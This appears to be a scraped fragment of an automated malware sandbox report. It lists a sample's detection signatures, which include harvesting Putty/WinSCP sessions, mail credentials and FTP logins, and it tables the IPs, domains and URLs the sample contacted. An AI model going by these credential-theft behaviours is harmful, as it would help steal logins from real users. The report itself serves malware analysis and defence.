CLOUDFLARENETUS United States 25->39 65 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 25->65 67 Tries to steal Mail credentials (via file / registry access) 25->67 69 Tries to harvest and steal ftp login credentials 25->69 71 2 other signatures 25->71 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
64.233.185.102
 drive.google.com United States
15169 GOOGLEUS false
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS false
64.233.185.132
 drive.usercontent.google.com United States
15169 GOOGLEUS false
172.67.74.152
 api.ipify.org United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
drive.google.com 64.233.185.102 true
drive.usercontent.google.com 64.233.185.132 true
api.ipify.org 172.67.74.152 true
ip-api.com 208.95.112.1 true
mail.myhydropowered.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
    		high
    http://ip-api.com/line/?fields=hosting false
      		high